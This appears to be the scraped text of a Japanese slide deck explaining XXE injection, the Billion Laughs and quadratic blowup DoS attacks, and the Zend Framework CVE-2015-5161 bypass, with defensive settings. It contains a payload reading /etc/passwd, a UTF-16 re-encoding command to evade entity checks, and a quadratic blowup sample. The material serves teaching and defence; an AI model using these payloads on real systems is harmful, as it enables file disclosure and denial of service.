Recomendados
Mais conteúdo relacionado
Último
Último (8)
Destaque
Destaque (20)
Jp xxe injection_20170627_moon
- 2. 目次 1. XXE Injection 基礎 2. 応用攻撃 (DOS) 3. Zend(PHP Framework) XXE 脆弱性
- 4. XXE Injectionとは? •XML eXternal Entity Injection •XMLのDTDの外部Entity参照機能を悪 用して重要なファイル閲覧、DOSなど の行為を行う攻撃
- 5. XML, データ交換用の言語 <recipe> <title>スプーンの上のピーナッツバター</ title> <ingredientlist> <ingredient>ピーナッツバター</ ingredient> </ ingredientlist> <preparation> スプーンを持ってピーナッツバターの器に入れた後、ピーナッツバターを 一さじだっぷりすくう </ preparation> </ recipe> => XHTML, RSS, XML-RPC, SOAP などに使われる
- 6. DTD (Document Type Definition) XML文書に使用されるコンポーネントを定義 <!DOCTYPE recipe [ <!ELEMENT recipe (title?, ingredientlist?,preparation?)> <!ELEMENT ingredientlist (ingredient+)> <!ELEMENT ingredient (#PCDATA)> <!ELEMENT preparation (#PCDATA)> ]>
- 7. Entityとは? • XMLでデータを参照するための方法 • DTDでENTITYというキーワードを使用して定義する。 • XML本文で参照して使用する。 • &ではじめ、;で終わる。
- 8. Entity 使用例 DTD XML本文 &foo; は “Xml enternal entity” 文字列を参照する
- 9. XXE Injectionの原理 • DTDに外部エンティティ定義が可能 (SYSTEMキーワー ド使用) • 外部エンティティは文章の外部に存在する値 • 外部エンティティに重要なファイルを指定する。
- 11. POC (Proof Of Concept) Source Code : https://github.com/JaewoongMoon/php-study/blob/master/xxe/index.php
- 12. 防御方法 •XMLを解析する際、エンティティ参照を 無効にする。 LIBXML_NOENT : エンティティ参照を可能にする。 LIBXML_DTDLOAD :外部参照DTDサブセットをロード Or libxml_disable_entity_loader関数を私用する。
- 13. 事例 • Facebook https://threatpost.com/xxe-bug-patched-in-facebook-careers-third- party-service/110151/ • Google ttp://securityaffairs.co/wordpress/23943/hacking/hacking-google- server-with-xml.html • Wordpress https://packetstormsecurity.com/files/121492/wpadvancedxml-xxe.txt
- 14. 関連CVE Database : 261件 http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=xxe
- 15. 1 4 1 2 1 7 18 42 67 45 57 16 0 10 20 30 40 50 60 70 80 2002 2005 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 年度別の発表件数の推移
- 16. 2.応用攻撃
- 17. Billion Laughs 攻撃 XML Bomb 笑笑笑笑笑笑笑笑笑笑笑 笑笑笑笑笑笑笑笑笑笑笑 笑笑笑笑笑笑笑笑笑笑笑 ~~~~~
- 18. https://en.wikipedia.org/wiki/Billion_laughs X 10 X 10 … 3Byte x 10^9 = 3GB
- 19. But, failed… Detected an entity reference loop in Entity
- 20. 代案攻撃 : Quadratic Blowup • 参照を1段階までにする。 • Entityの内容を長くする。 • 参照回数を多くする。 <?xml version="1.0"?> <!DOCTYPE test[ <!ENTITY a "lololollololollololollololollololollololollol...."> ]> <test><testing>&a;&a;&a;&a;&a;&a;&a;&a;&a;... </testing></test> 10000個ぐらい いれたら?
- 21. POC (Proof Of Concept) Source Code : https://github.com/JaewoongMoon/php-study/blob/master/xxe/lol_test.php
- 22. 3. Zend Framework XXE 脆弱性
- 24. CVE-2015-5161 • Zend Frameworkのバージョン2.4.2以下(最新バージョンは2.5.3) • Php-fpmを使用している環境 • Php-fpmはPHP FastCGI Process Managerの略で、 動的ページを早く提供するために使用される。
- 25. 防御しているのに、何で脆弱? • libxml_disable_entity_loaderは、スレッド安全ではない。 => 外部EntitySettingがあるFPM Processによって 上書きされる可能性がある! => php-fpm環境でlibxml_disable_entity_loaderをつかうのは 安全ではない。
- 28. Entity 監査迂回 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE methodCall [ <!ENTITY pocdata SYSTEM "file:///etc/passwd"> ]> <methodCall> <methodName>retrieved: &pocdata;</methodName> </methodCall> $ cat poc-utf8.xml | sed 's/UTF-8/UTF-16/' ¥ | iconv -f UTF-8 -t UTF-16 >poc-utf16.xml poc-utf8.xml
- 29. 脆弱性修正後コード https://github.com/zendframework/Zen dXml/blob/master/library/ZendXml/Sec urity.php#L332
- 30. 参考資料 • http://hyunmini.tistory.com/66 • https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection • https://ko.wikipedia.org/wiki/XML • https://en.wikipedia.org/wiki/Document_type_definition • http://php.net/manual/en/domdocument.loadxml.php • http://php.net/manual/en/libxml.constants.php • http://php.net/manual/en/language.operators.bitwise.php • http://stackoverflow.com/questions/38807506/what-does-libxml-noent-do-and-why-isnt-it- called-libxml-ent • https://www.exploit-db.com/exploits/37765/ • https://framework.zend.com/security/advisory/ZF2015-06 • https://github.com/zendframework/ZendXml/blob/master/library/ZendXml/Security.php#L332
- 31. ありがとうございます。